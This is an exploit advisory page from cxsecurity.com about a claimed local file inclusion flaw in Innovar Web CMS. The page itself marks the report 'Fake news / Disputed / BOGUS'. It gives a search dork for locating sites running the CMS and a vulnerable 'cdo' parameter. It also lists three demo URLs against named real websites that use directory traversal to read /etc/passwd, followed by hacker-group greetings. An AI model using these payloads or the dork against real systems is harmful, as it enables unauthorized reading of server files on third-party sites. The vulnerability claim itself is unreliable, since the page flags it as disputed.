WARNING! Fake news / Disputed / BOGUS

Innovar Web CMS Local File Inclusion Vulnerbility

2012-11-09 / 2012-11-10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

-=-=-=-=-=- In The Name Of God -=-=-=-=-=- -------------------------------------------------------------------------------- @ Innovar Web CMS Local File Inclusion Vulnerbility -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- # Name:Innovar Web CMS Local File Inclusion Vulnerbility # Vendor: http://www.innovarweb.com.ar/ # Date: 2012-10-22 # Author: Ashiyane Digital Security Team # Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org # Home: www.ashiyane.org/forums/ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Dork: intext:"Desarrollado por Innovar Web" -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- [+] Vulnerability ~> [+] Vulnerability: http://127.0.0.1/path/index.php?cdo=[Include] [+] Demo(s) : [+] http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd [+] http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd [+] http://www.ojalatesirva.com.ar/interior/index.php?cdo=../../../../../../etc/passwd =========================================================================== @ Gr33tz: @ Ashiyane Members : @ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04 @ PrinceOfHacking,elvator,unique2world,HidDeEn,Encoder,N4H,Classic,Zend @ Angel--D3m0n,Azad&#8482;,HashoR,Pr0grammer,Unline And All Ashiyane Bug ResearcherS =========================================================================== ASHIYANE DIGITAL SECURITY TEAM Persian Gulf F0r Ever WE LOVE IRAN <<./By MojiRider >>

References:

http://www.innovarweb.com.ar/
http://cxsecurity.com/issue/WLB-2012090008


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top